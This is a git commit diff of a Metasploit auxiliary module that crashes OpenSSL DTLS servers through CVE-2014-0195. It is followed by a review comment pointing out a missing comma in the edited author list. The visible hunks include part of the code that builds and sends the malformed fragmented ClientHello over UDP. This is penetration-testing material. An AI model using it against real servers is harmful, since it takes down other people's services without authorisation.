Minor fixup on DTLS module

unstable
Tod Beardsley 2014-06-09 13:42:30 -05:00
parent 0e611b5d64
commit 0e14d77dba
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
1 changed files with 8 additions and 6 deletions


@ -12,17 +12,17 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'OpenSSL DTLS Fragment Buffer Overflow DoS', 'Name' => 'OpenSSL DTLS Fragment Buffer Overflow DoS',
'Description' => %q{ 'Description' => %q{
This module performs a Denial of Service Attack against Datagram TLS in This module performs a Denial of Service Attack against Datagram TLS in
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h. OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.
This occurs when a DTLS ClientHello message has multiple fragments and the This occurs when a DTLS ClientHello message has multiple fragments and the
fragment lengths of later fragments are larger than that of the first, a fragment lengths of later fragments are larger than that of the first, a
buffer overflow occurs, causing a DoS. buffer overflow occurs, causing a DoS.
}, },
'Author' => 'Author' =>
[ [
'Juri Aedla', # Vulnerability discovery 'Juri Aedla <asd[at]ut.ee>' # Vulnerability discovery
'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module 'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
@ -30,7 +30,9 @@ class Metasploit3 < Msf::Auxiliary
[ [
['CVE', '2014-0195'], ['CVE', '2014-0195'],
['ZDI', '14-173'], ['ZDI', '14-173'],
['BID', '67900'] ['BID', '67900'],
['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002'],
['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048']
], ],
'DisclosureDate' => 'Jun 05 2014')) 'DisclosureDate' => 'Jun 05 2014'))
@ -73,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
fragments << build_tls_fragment(1, 1234, 0, 0, 123, Rex::Text.rand_text_alpha(1234)) fragments << build_tls_fragment(1, 1234, 0, 0, 123, Rex::Text.rand_text_alpha(1234))
message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments) message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments)
connect_udp connect_udp
print_status("Sending fragmented DTLS client hello packet to #{rhost}:#{rport}") print_status("#{rhost}:#{rport} - Sending fragmented DTLS client hello packet")
udp_sock.put(message) udp_sock.put(message)
disconnect_udp disconnect_udp
end end
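Review bot: The new first entry of the 'Author' array, as rendered here, has lost the comma that the old line had between the string and its trailing comment, so nothing separates it from the 'Jon Hart' entry on the next line. Ruby does not accept a newline as an element separator inside an array literal, so the module would most likely fail to load with a syntax error instead of listing two authors. The line should read `'Juri Aedla <asd[at]ut.ee>', # Vulnerability discovery`. The `initialize` body starts and ends outside the visible hunks, so this is judged from the lines shown only.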